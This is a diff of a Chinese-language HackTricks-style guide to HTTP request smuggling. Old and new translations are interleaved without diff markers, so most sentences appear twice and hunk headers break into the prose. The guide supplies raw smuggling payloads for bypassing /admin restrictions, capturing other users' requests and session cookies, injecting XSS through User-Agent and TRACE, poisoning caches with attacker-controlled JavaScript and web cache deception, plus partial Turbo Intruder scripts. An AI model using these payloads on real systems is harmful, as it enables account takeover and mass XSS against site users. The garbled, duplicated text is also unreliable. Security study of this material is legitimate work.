滥用逐跳头,您可以指示代理**删除标题Content-Length或Transfer-Encoding以便滥用HTTP请求走私**
滥用逐跳头,您可以指示代理 **删除 Content-Length 或 Transfer-Encoding 头,以便可以滥用 HTTP 请求走私**
```
Connection: Content-Length
```
## 寻找HTTP请求走私
For **有关逐跳头的更多信息** 访问:
通过观察服务器对操纵请求的响应时间来识别HTTP请求走私漏洞通常是可行的这依赖于时间技术。这些技术对于检测CL.TE和TE.CL漏洞特别有用。除了这些方法还有其他策略和工具可用于发现此类漏洞
{% content-ref url="../abusing-hop-by-hop-headers.md" %}
[abusing-hop-by-hop-headers.md](../abusing-hop-by-hop-headers.md)
{% endcontent-ref %}
### 使用时间技术查找CL.TE漏洞
## 查找 HTTP 请求走私
* **方法:**
识别 HTTP 请求走私漏洞通常可以通过时间技术实现,这依赖于观察服务器响应被操纵请求所需的时间。这些技术对于检测 CL.TE 和 TE.CL 漏洞特别有用。除了这些方法,还有其他策略和工具可以用来发现此类漏洞:
### 使用时间技术查找 CL.TE 漏洞
* **方法:**
* 发送一个请求,如果应用程序存在漏洞,将导致后端服务器等待额外数据。
* **示例:**
* **示例**
```
POST / HTTP/1.1
@ -198,18 +206,18 @@ Content-Length: 4
A
0
```
* **观察:**
* 前端服务器根据`Content-Length`处理请求,并过早截断消息。
* 后端服务器期望收到一个分块消息,等待下一个从未到达的块,导致延迟。
* **指标:**
* **观察**
* 前端服务器根据 `Content-Length` 处理请求,并提前截断消息。
* 后端服务器期望收分块消息,等待下一个从未到达的块,导致延迟。
* **指标**
* 响应超时或长时间延迟。
* 从后端服务器收到400 Bad Request错误有时附带详细的服务器信息。
* 从后端服务器收到 400 Bad Request 错误,有时附带详细的服务器信息。
### 使用时间技术查找TE.CL漏洞
### 使用时间技术查找 TE.CL 漏洞
* **方法:**
* **方法**
* 发送一个请求,如果应用程序存在漏洞,将导致后端服务器等待额外数据。
* **示例:**
* **示例**
```
POST / HTTP/1.1
@ -221,44 +229,44 @@ Content-Length: 6
0
X
```
* **观察:**
* 前端服务器根据`Transfer-Encoding`处理请求并转发整个消息。
* 后端服务器期望基于`Content-Length`的消息,等待从未到达的额外数据,导致延迟。
* **观察**
* 前端服务器根据 `Transfer-Encoding` 处理请求并转发整个消息。
* 后端服务器期望根据 `Content-Length` 接收消息,等待从未到达的额外数据,导致延迟。
### 其他查找漏洞的方法
### 查找漏洞的其他方法
* **差异响应分析:**
* 发送略有变化的请求版本,并观察服务器响应是否以意外方式不同,指示解析差异。
* **使用自动化工具:**
* 像Burp Suite的'HTTP Request Smuggler'扩展这样的工具可以通过发送各种模糊请求并分析响应自动测试这些漏洞。
* **Content-Length变化测试:**
* 发送具有不与实际内容长度对齐的不同`Content-Length`值的请求,并观察服务器如何处理这种不匹配。
* **Transfer-Encoding变化测试:**
* 发送具有混淆或格式不正确的`Transfer-Encoding`头的请求,并监视前端和后端服务器对这种操纵的不同响应。
* **差异响应分析**
* 发送略有不同版本的请求,观察服务器响应是否以意外方式不同,指示解析差异。
* **使用自动化工具**
* 像 Burp Suite 'HTTP Request Smuggler' 扩展可以通过发送各种模糊请求并分析响应自动测试这些漏洞。
* **Content-Length 变异测试:**
* 发送具有不`Content-Length` 值的请求,这些值与实际内容长度不一致,并观察服务器如何处理此类不匹配。
* **Transfer-Encoding 变异测试:**
* 发送具有模糊或格式错误的 `Transfer-Encoding` 头的请求,并监控前端和后端服务器对这些操控的不同响应。
### HTTP请求走私漏洞测试
### HTTP 请求走私漏洞测试
在确认时间技术的有效性后,验证客户端请求是否可被操纵至关重要。一种简单的方法是尝试操纵您的请求,例如,使对`/`的请求产生404响应。在[基本示例](./#basic-examples)中先前讨论的`CL.TE`和`TE.CL`示例演示了如何操纵客户端请求以引发404响应尽管客户端的目标是访问不同的资源。
在确认时间技术的有效性后,验证客户端请求是否可被操纵至关重要。一种简单的方法是尝试毒化您的请求,例如,使对 `/` 的请求返回 404 响应。之前在 [基本示例](./#basic-examples) 中讨论的 `CL.TE``TE.CL` 示例演示了如何毒化客户端请求以引发 404 响应,尽管客户端旨在访问不同的资源。
**关键考虑事项**
在通过干扰其他请求测试请求走私漏洞时,请记住:
* **不同的网络连接:** “攻击”和“正常”请求应分别通过不同的网络连接发送。使用相同连接发送两者不会验证漏洞的存在。
* **一致的URL和参数:** 务必为两个请求使用相同的URL和参数名称。现代应用程序通常根据URL和参数将请求路由到特定的后端服务器。匹配这些内容增加了两个请求由同一服务器处理的可能性这是成功攻击的先决条件
* **时间和竞争条件:** “正常”请求旨在检测来自“攻击”请求的干扰,与其他并发应用程序请求竞争。因此,应立即在“攻击”请求后发送“正常”请求。繁忙的应用程序可能需要多次尝试才能得出结论性的漏洞确认
* **负载均衡挑战:** 充当负载均衡器的前端服务器可能会将请求分发到各种后端系统。如果“攻击”和“正常”请求最终进入不同的系统,攻击将不会成功。这种负载平衡方面可能需要多次尝试才能确认漏洞。
* **意外用户影响:** 如果您的攻击意外影响了另一个用户的请求(而不是您发送用于检测的“正常”请求),这表明您的攻击影响了另一个应用程序用户。持续测试可能会干扰其他用户,需要谨慎处理。
* **独立网络连接:** “攻击”和“正常”请求应通过独立的网络连接发送。对两者使用相同连接并不能验证漏洞的存在。
* **一致的 URL 和参数:** 力求对两个请求使用相同的 URL 和参数名称。现代应用程序通常根据 URL 和参数将请求路由到特定的后端服务器。匹配这些可以增加两个请求由同一服务器处理的可能性,这是成功攻击的前提
* **时间和竞争条件** “正常”请求旨在检测“攻击”请求的干扰,与其他并发应用请求竞争。因此,在“攻击”请求后立即发送“正常”请求。繁忙的应用程序可能需要多次尝试以确认漏洞
* **负载均衡挑战** 作为负载均衡器的前端服务器可能会将请求分配到不同的后端系统。如果“攻击”和“正常”请求最终落在不同的系统上,攻击将不会成功。这个负载均衡方面可能需要多次尝试以确认漏洞。
* **意外用户影响** 如果您的攻击无意中影响了另一个用户的请求(不是您发送的“正常”请求以进行检测),这表明您的攻击影响了另一个应用用户。持续测试可能会干扰其他用户,因此需要谨慎处理。
## 滥用HTTP请求走私
## 滥用 HTTP 请求走私
### 通过HTTP请求走私绕过前端安全
### 通过 HTTP 请求走私绕过前端安全
有时,前端代理实施安全措施,审查传入请求。然而,这些措施可以通过利用HTTP请求走私来绕过从而允许未经授权访问受限端点。例如外部可能禁止访问`/admin`前端代理会主动阻止此类尝试。然而该代理可能忽略检查走私HTTP请求中嵌入的请求为绕过这些限制留下漏洞。
有时,前端代理实施安全措施,审查传入请求。然而,这些措施可以通过利用 HTTP 请求走私来规避,从而允许未经授权访问受限端点。例如,访问 `/admin` 可能在外部被禁止,前端代理积极阻止此类尝试。然而,这个代理可能忽略了在走私的 HTTP 请求中嵌入的请求,从而留下了绕过这些限制的漏洞。
考虑以下示例说明如何使用HTTP请求走私绕过前端安全控制特别针对通常由前端代理保护的`/admin`路径:
考虑以下示例,说明如何使用 HTTP 请求走私绕过前端安全控制,特别针对通常由前端代理保护的 `/admin` 路径:
**CL.TE示例**
**CL.TE 示例**
```
POST / HTTP/1.1
Host: [redacted].web-security-academy.net
@ -275,7 +283,7 @@ Content-Length: 10
x=
```
在 CL.TE 攻击中,利用 `Content-Length` 头部进行初始请求,而随后嵌入的请求则利用 `Transfer-Encoding: chunked` 头部。前端代理处理初始的 `POST` 请求,但未能检查嵌入的 `GET /admin` 请求,从而允许未经授权访问 `/admin` 路径。
在 CL.TE 攻击中,初始请求利用了 `Content-Length` 头,而随后的嵌入请求则使用 `Transfer-Encoding: chunked`。前端代理处理初始的 `POST` 请求,但未能检查嵌入的 `GET /admin` 请求,从而允许未经授权访问 `/admin` 路径。
**TE.CL 示例**
```
@ -293,13 +301,13 @@ a=x
0
```
相反在TE.CL攻击中初始的`POST`请求使用`Transfer-Encoding: chunked`,而后续嵌入的请求则基于`Content-Length`头进行处理。类似于CL.TE攻击前端代理忽略了携带的`GET /admin`请求,无意中授予对受限`/admin`路径的访问权限
相反在TE.CL攻击中初始的`POST`请求使用`Transfer-Encoding: chunked`,而后续嵌入的请求则基于`Content-Length`头进行处理。与CL.TE攻击类似前端代理忽视了被走私的`GET /admin`请求,无意中授予了对受限`/admin`路径的访问
### 揭示前端请求重写 <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
应用程序通常使用**前端服务器**在将请求传递给后端服务器之前修改传入请求。典型的修改包括添加头部,例如`X-Forwarded-For: <客户端的IP>`以将客户端的IP传递给后端。了解这些修改可能至关重要因为这可能揭示了**绕过保护**或**揭示隐藏信息或端点**的方法。
应用程序通常使用**前端服务器**来修改传入请求,然后将其传递给后端服务器。典型的修改涉及添加头信息,例如`X-Forwarded-For: <IP of the client>`以将客户端的IP转发给后端。理解这些修改可能至关重要因为它可能揭示**绕过保护**或**发现隐藏的信息或端点**的方法。
要调查代理如何修改请求请查找后端在响应中回显的POST参数。然后制作一个请求将此参数放在最后,类似于以下内容:
要调查代理如何更改请求找到一个后端在响应中回显的POST参数。然后构造一个请求使用这个参数作为最后一个,类似于以下内容:
```
POST / HTTP/1.1
Host: vulnerable-website.com
@ -316,19 +324,19 @@ Content-Length: 100
search=
```
在这种结构中,后续请求组件被附加在`search=`之后,这是在响应中反映的参数。这种反射将暴露后续请求的标头
在这个结构中,后续请求组件被附加在 `search=` 之后,这是在响应中反映的参数。这个反映将暴露后续请求的头部
重要的是将嵌套请求的`Content-Length`标头与实际内容长度对齐。建议从一个小值开始逐渐增加,因为值过低将截断反映的数据,而值过高可能会导致请求出错。
重要的是要将嵌套请求的 `Content-Length` 头与实际内容长度对齐。建议从一个小值开始并逐渐增加,因为过低的值会截断反映的数据,而过高的值可能会导致请求出错。
这种技术也适用于TE.CL漏洞但请求应以`search=\r\n0`结束。无论换行符是什么,这些值都将附加到搜索参数
该技术在 TE.CL 漏洞的上下文中也适用,但请求应以 `search=\r\n0` 结束。无论换行符如何,值将附加到搜索参数中
这种方法主要用于了解前端代理所做的请求修改,实质上是执行自我导向的调查。
此方法主要用于理解前端代理所做的请求修改,基本上进行自我导向的调查。
### 捕获其他用户的请求 <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
通过将特定请求附加为参数值来捕获下一个用户的请求是可行的。在进行POST操作时可以通过以下方式实现这一点
通过在 POST 操作期间将特定请求附加为参数的值,可以捕获下一个用户的请求。以下是如何实现这一点的:
通过将以下请求附加为参数值,您可以存储后续客户端的请求:
通过将以下请求附加为参数值,您可以存储后续客户端的请求:
```
POST / HTTP/1.1
Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net
@ -348,20 +356,20 @@ Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi
csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40email.com&comment=
```
在这种情况下,**comment参数**旨在存储公开页面上评论部分中的内容。因此,随后的请求内容将显示为评论
在这种情况下,**comment 参数**旨在存储在公开可访问页面上帖子评论部分的内容。因此,后续请求的内容将作为评论出现
然而,这种技术有局限性。通常它仅捕获直到被用于伪造请求的参数分隔符为止的数据。对于URL编码的表单提交这个分隔符是`&`字符。这意味着从受害用户请求中捕获的内容将在第一个`&`处停止,甚至可能是查询字符串的一部分。
然而,这种技术有其局限性。通常,它仅捕获直到在走私请求中使用的参数分隔符的数据。对于 URL 编码的表单提交,这个分隔符是 `&` 字符。这意味着从受害用户请求中捕获的内容将在第一个 `&` 处停止,这可能甚至是查询字符串的一部分。
此外,值得注意的是,这种方法在存在TE.CL漏洞时也是可行的。在这种情况下请求应以`search=\r\n0`结尾。无论换行符是什么,值都将附加到搜索参数上
此外,值得注意的是,这种方法在 TE.CL 漏洞中也是可行的。在这种情况下,请求应以 `search=\r\n0` 结束。无论换行符如何,值将附加到搜索参数中
### 利用HTTP请求走私来利用反射型XSS
### 使用 HTTP 请求走私来利用反射型 XSS
HTTP请求走私可用于利用易受**反射型XSS**攻击的网页,提供重要优势:
HTTP 请求走私可以被利用来攻击易受 **反射型 XSS** 的网页,提供显著的优势:
* **无需与目标用户交互**。
* 允许利用通常**无法获取**的请求部分中的XSS如HTTP请求头。
* 不需要与目标用户进行 **交互**。
* 允许**通常无法达到** 的请求部分利用 XSS例如 HTTP 请求头。
在网站容易通过用户代理标头受到反射型XSS攻击的情况下,以下有效载荷演示了如何利用此漏洞:
在网站通过 User-Agent 头易受反射型 XSS 攻击的情况下,以下有效载荷演示了如何利用此漏洞:
```
POST / HTTP/1.1
Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net
@ -382,37 +390,37 @@ Content-Type: application/x-www-form-urlencoded
A=
```
这个 payload 的结构用于利用漏洞
这个有效载荷的结构旨在利用漏洞,通过以下方式
1. 发起一个 `POST` 请求,看似典型,带有一个 `Transfer-Encoding: chunked` 头部来指示开始进行走私。
2. 接着是一个 `0`,标记着分块消息体的结束。
3. 然后,引入一个走私的 `GET` 请求,其中 `User-Agent` 头部被注入了一个脚本 `<script>alert(1)</script>`,当服务器处理这个后续请求时触发 XSS。
1. 发起一个看似典型的 `POST` 请求,带有 `Transfer-Encoding: chunked` 头部以指示开始走私。
2. 随后跟随一个 `0`,标记块消息体的结束。
3. 然后,引入一个走私的 `GET` 请求,其中 `User-Agent` 头部注入了一个脚本,`<script>alert(1)</script>`,当服务器处理这个后续请求时触发 XSS。
通过走私来操纵 `User-Agent`payload 能够绕过正常请求的限制,从而以非标准但有效的方式利用反射型 XSS 漏洞。
通过走私操控 `User-Agent`,该有效载荷绕过了正常请求约束,从而以非标准但有效的方式利用了反射型 XSS 漏洞。
#### HTTP/0.9
{% hint style="danger" %}
如果用户内容在响应中反射,且具有诸如 **`text/plain`** 这样的 **`Content-type`**,可能会阻止 XSS 的执行。如果服务器支持 **HTTP/0.9,可能可以绕过这个限制**
如果用户内容在响应中**`Content-type`** 反射,例如 **`text/plain`**,将阻止 XSS 的执行。如果服务器支持 **HTTP/0.9,可能可以绕过这一点**
{% endhint %}
HTTP/0.9 版本先于 1.0 版本出现,只使用 **GET** 动词,且**不**会响应 **头部**,只有主体。
版本 HTTP/0.9 早于 1.0,仅使用 **GET** 动词,并且 **不** 响应 **头部**,只有主体。
[**这篇文章**](https://mizu.re/post/twisty-python)中,通过请求走私和一个**会将用户输入作为响应返回的易受攻击的端点**,滥用了 HTTP/0.9。将在响应中反映的参数包含了一个**伪造的 HTTP/1.1 响应(带有头部和主体)**,因此响应将包含具有 `Content-Type``text/html` 的有效可执行 JS 代码
[**这篇文章**](https://mizu.re/post/twisty-python) 中,利用了请求走私和一个 **会回复用户输入的脆弱端点** 来走私一个 HTTP/0.9 请求。响应中反射的参数包含一个 **伪造的 HTTP/1.1 响应(带有头部和主体)**,因此响应将包含有效的可执行 JS 代码,`Content-Type` 为 `text/html`
### 利用 HTTP 请求走私对站点重定向进行利用 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
### 利用 HTTP 请求走私进行站内重定向 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
应用程序通常通过在重定向 URL 中使用 `Host` 头部中的主机名从一个 URL 重定向到另一个。这在像 Apache 和 IIS 这样的 Web 服务器中很常见。例如,请求一个没有尾随斜杠的文件夹会导致重定向以包含斜杠:
应用程序通常通过使用重定向 URL 中的 `Host` 头部的主机名从一个 URL 重定向到另一个 URL。这在像 Apache 和 IIS 这样的 Web 服务器中很常见。例如,请求一个没有尾部斜杠的文件夹会导致重定向以包含斜杠:
```
GET /home HTTP/1.1
Host: normal-website.com
```
结果如下
结果
```
HTTP/1.1 301 Moved Permanently
Location: https://normal-website.com/home/
```
尽管看似无害但这种行为可以通过HTTP请求走私来操纵,将用户重定向到外部网站。例如:
尽管看似无害但这种行为可以通过HTTP请求走私进行操控,以将用户重定向到外部网站。例如:
```
POST / HTTP/1.1
Host: vulnerable-website.com
@ -426,27 +434,29 @@ GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
```
种走私请求可能导致下一个处理的用户请求被重定向到攻击者控制的网站:
个被走私的请求可能导致下一个处理的用户请求被重定向到攻击者控制的网站:
```
GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /scripts/include.js HTTP/1.1
Host: vulnerable-website.com
```
结果如下
结果
```
HTTP/1.1 301 Moved Permanently
Location: https://attacker-website.com/home/
```
### 通过HTTP请求走私利用Web缓存投毒 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
在这个场景中,用户对 JavaScript 文件的请求被劫持。攻击者可以通过响应恶意 JavaScript 来潜在地危害用户。
如果**前端基础设施的任何组件缓存内容**通常是为了提高性能那么可以执行Web缓存投毒。通过操纵服务器的响应可以**投毒缓存**。
### 通过 HTTP 请求走私利用 Web 缓存中毒 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
之前我们观察到服务器响应可以被修改以返回404错误参见[基本示例](./#basic-examples))。类似地,可以欺骗服务器,使其在响应对`/static/include.js`的请求时提供`/index.html`内容。因此,`/static/include.js`的内容被`/index.html`的内容替换在缓存中,使得用户无法访问`/static/include.js`可能导致拒绝服务DoS
如果 **前端基础设施的任何组件缓存内容**,则可以执行 Web 缓存中毒,通常是为了提高性能。通过操纵服务器的响应,可以 **毒化缓存**
如果发现**开放重定向漏洞**或存在**站点重定向到开放重定向**,则此技术变得特别强大。可以利用这些漏洞将`/static/include.js`的缓存内容替换为受攻击者控制的脚本,从而在所有请求更新的`/static/include.js`的客户端中实施广泛的跨站脚本XSS攻击
之前,我们观察到如何改变服务器响应以返回 404 错误(参见 [基本示例](./#basic-examples))。同样,可以欺骗服务器以响应对 `/static/include.js` 的请求而提供 `/index.html` 内容。因此,`/static/include.js` 的内容在缓存中被替换为 `/index.html` 的内容,使得 `/static/include.js` 对用户不可访问可能导致服务拒绝DoS
下面是一个利用**缓存投毒结合站点重定向到开放重定向**的示例。目标是修改`/static/include.js`的缓存内容以提供受攻击者控制的JavaScript代码
如果发现 **开放重定向漏洞** 或者存在 **指向开放重定向的站内重定向**,这种技术变得特别强大。这些漏洞可以被利用来将 `/static/include.js` 的缓存内容替换为攻击者控制的脚本,从而实质上使所有请求更新的 `/static/include.js` 的客户端面临广泛的跨站脚本XSS攻击。
下面是利用 **缓存中毒结合站内重定向到开放重定向** 的示例。目标是改变 `/static/include.js` 的缓存内容,以提供由攻击者控制的 JavaScript 代码:
```
POST / HTTP/1.1
Host: vulnerable.net
@ -464,20 +474,20 @@ Content-Length: 10
x=1
```
注意嵌入的请求针对 `/post/next?postId=3`。该请求将被重定向到 `/post?postId=4`,利用**Host 头值**来确定域。通过修改**Host 头**,攻击者可以将请求重定向到他们的域(**站内重定向到开放重定向**
注意嵌入的请求针对 `/post/next?postId=3`。该请求将被重定向到 `/post?postId=4`,利用 **Host 头部值** 来确定域名。通过更改 **Host 头部**,攻击者可以将请求重定向到他们的域名 (**站内重定向到开放重定向**)
成功进行**socket 毒化**后,应发起对 `/static/include.js` 的**GET 请求**。该请求将受到之前的**站内重定向到开放重定向**请求的影响,并获取攻击者控制的脚本内容。
在成功的 **socket poisoning** 之后,应发起对 `/static/include.js`**GET 请求**。该请求将受到先前 **站内重定向到开放重定向** 请求的污染,并获取由攻击者控制的脚本内容。
随后,任何对 `/static/include.js` 的请求将提供攻击者脚本的缓存内容,有效地发起广泛的 XSS 攻击。
随后,任何对 `/static/include.js` 的请求将提供攻击者脚本的缓存内容,有效地发起广泛的 XSS 攻击。
### 使用 HTTP 请求走私执行 Web 缓存欺骗 <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
### 使用 HTTP 请求走私进行网络缓存欺骗 <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
> **Web 缓存毒化和 Web 缓存欺骗之间有什么区别?**
> **网络缓存中毒和网络缓存欺骗有什么区别?**
>
> * 在**Web 缓存毒化**中,攻击者导致应用程序将一些恶意内容存储在缓存中,并将此内容从缓存提供给其他应用程序用户。
> * 在**Web 缓存欺骗**中,攻击者导致应用程序将属于另一个用户的一些敏感内容存储在缓存中,然后攻击者从缓存中检索此内容。
> * 在 **网络缓存中毒** 中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容从缓存中提供给其他应用程序用户。
> * 在 **网络缓存欺骗** 中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
攻击者构造了一个走私请求,用于获取敏感的特定用户内容。考虑以下示例:
攻击者构造一个走私请求,以获取敏感的用户特定内容。考虑以下示例:
```markdown
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
@ -488,17 +498,17 @@ x=1
`GET /private/messages HTTP/1.1`\
`Foo: X`
```
如果这个走私请求毒害了一个用于静态内容的缓存条目(例如,`/someimage.png`),受害者的敏感数据可能会被缓存在静态内容的缓存条目下。因此,攻击者可能会潜在地检索这些缓存的敏感数据。
如果这个走私请求污染了用于静态内容的缓存条目(例如,`/someimage.png`),那么受害者在`/private/messages`中的敏感数据可能会被缓存到静态内容的缓存条目下。因此,攻击者可能会检索这些缓存的敏感数据。
### 通过 HTTP 请求走私滥用 TRACE <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
### 通过HTTP请求走私滥用TRACE <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
[**在这篇文章中**](https://portswigger.net/research/trace-desync-attack)建议如果服务器启用了 TRACE 方法,可能会滥用它进行 HTTP 请求走私。这是因为这个方法会将发送到服务器的任何标头作为响应主体的一部分反射回去。例如:
[**在这篇文章中**](https://portswigger.net/research/trace-desync-attack) 建议如果服务器启用了TRACE方法可能会通过HTTP请求走私进行滥用。这是因为该方法会将发送到服务器的任何头部反射为响应体的一部分。例如:
```
TRACE / HTTP/1.1
Host: example.com
XSS: <script>alert("TRACE")</script>
```
将发送类似以下响应:
将发送下响应:
```
HTTP/1.1 200 OK
Content-Type: message/http
@ -509,15 +519,15 @@ Host: vulnerable.com
XSS: <script>alert("TRACE")</script>
X-Forwarded-For: xxx.xxx.xxx.xxx
```
一个滥用这种行为的示例是**先发送一个HEAD请求**。这个请求将只返回一个GET请求的**头部**(其中包括**`Content-Type`**)。然后**立即在HEAD请求后发送一个TRACE请求**,这个请求将**反射发送的数据**。\
由于HEAD响应将包含一个`Content-Length`头部,**TRACE请求的响应将被视为HEAD响应的主体从而在响应中反射任意数据**。\
这个响应将被发送到连接上的下一个请求,因此这可以被**用在缓存的JS文件中例如注入任意JS代码**。
一个滥用这种行为的例子是**首先伪装一个HEAD请求**。这个请求将只会返回一个GET请求的**头部****`Content-Type`**在其中。然后立即在HEAD请求后伪装一个TRACE请求将**反射发送的数据**。\
由于HEAD响应将包含一个`Content-Length`头部,**TRACE请求的响应将被视为HEAD响应的主体因此在响应中反射任意数据**。\
这个响应将被发送到连接上的下一个请求,因此这可以**用于缓存的JS文件中例如注入任意JS代码**。
### 通过HTTP响应拆分滥用TRACE <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
继续阅读[**这篇文章**](https://portswigger.net/research/trace-desync-attack)建议另一种滥用TRACE方法的方式。正如评论中所述通过传输一个HEAD请求和一个TRACE请求可以**控制响应中一些反射的数据**。HEAD请求的主体长度基本上在Content-Length头部中指示并由TRACE请求的响应组成。
继续关注[**这篇文章**](https://portswigger.net/research/trace-desync-attack)建议了另一种滥用TRACE方法的方式。如评论所述伪装一个HEAD请求和一个TRACE请求可以**控制HEAD请求响应中的一些反射数据**。HEAD请求主体的长度基本上在Content-Length头部中指示并由TRACE请求的响应形成。
因此新的想法是知道这个Content-Length和TRACE响应中给的数据可以使TRACE响应在Content-Length的最后一个字节之后包含一个有效的HTTP响应从而使攻击者完全控制对下一个响应的请求(这可以用于执行缓存投毒)。
因此新的想法是知道这个Content-Length和TRACE响应中给的数据可以使TRACE响应在Content-Length的最后一个字节之后包含一个有效的HTTP响应从而允许攻击者完全控制下一个响应的请求(这可以用于执行缓存中毒)。
示例:
```
@ -538,7 +548,7 @@ Content-Length: 44\r\n
\r\n
<script>alert("response splitting")</script>
```
将生成这些响应(请注意HEAD 响应具有 Content-Length使 TRACE 响应成为 HEAD 主体的一部分,一旦 HEAD Content-Length 结束,就会传递有效的 HTTP 响应):
将生成这些响应(注意HEAD响应具有Content-Length使得TRACE响应成为HEAD主体的一部分一旦HEAD Content-Length结束一个有效的HTTP响应被走私
```
HTTP/1.1 200 OK
Content-Type: text/html
@ -559,33 +569,33 @@ Content-Length: 50
<script>alert(arbitrary response)</script>
```
### 利用 HTTP 请求串联与 HTTP 响应解同步化进行武器化
### 利用HTTP响应不同步进行HTTP请求走私
您是否发现了一些 HTTP 请求串联漏洞,但不知道如何利用它。尝试这些其他利用方法:
您是否发现了一些HTTP请求走私漏洞但不知道如何利用它尝试这些其他的利用方法:
{% content-ref url="../http-response-smuggling-desync.md" %}
[http-response-smuggling-desync.md](../http-response-smuggling-desync.md)
{% endcontent-ref %}
### 其他 HTTP 请求串联技术
### 其他HTTP请求走私技术
* 浏览器 HTTP 请求串联(客户端)
* 浏览器HTTP请求走私(客户端)
{% content-ref url="browser-http-request-smuggling.md" %}
[browser-http-request-smuggling.md](browser-http-request-smuggling.md)
{% endcontent-ref %}
* HTTP/2 降级中的请求串联
* HTTP/2降级中的请求走私
{% content-ref url="request-smuggling-in-http-2-downgrades.md" %}
[request-smuggling-in-http-2-downgrades.md](request-smuggling-in-http-2-downgrades.md)
{% endcontent-ref %}
## Turbo intruder 脚本
## Turbo intruder脚本
### CL.TE
源:[https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
自 [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
```python
def queueRequests(target, wordlists):
@ -626,7 +636,7 @@ table.add(req)
```
### TE.CL
From: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
来自: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
@ -675,7 +685,7 @@ table.add(req)
* [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
* [https://github.com/defparam/smuggler](https://github.com/defparam/smuggler)
* [https://github.com/Moopinger/smugglefuzz](https://github.com/Moopinger/smugglefuzz)
* [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): 这个工具是基于语法的HTTP Fuzzer用于发现奇怪的请求欺骗差异。
* [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): 该工具是一个基于语法的HTTP模糊测试器有助于发现奇怪的请求走私差异。
## 参考资料
@ -688,16 +698,17 @@ table.add(req)
* [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
* [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,126 +1,159 @@
# HTTP 响应串联 / Desync
# HTTP Response Smuggling / Desync
{% hint style="success" %}
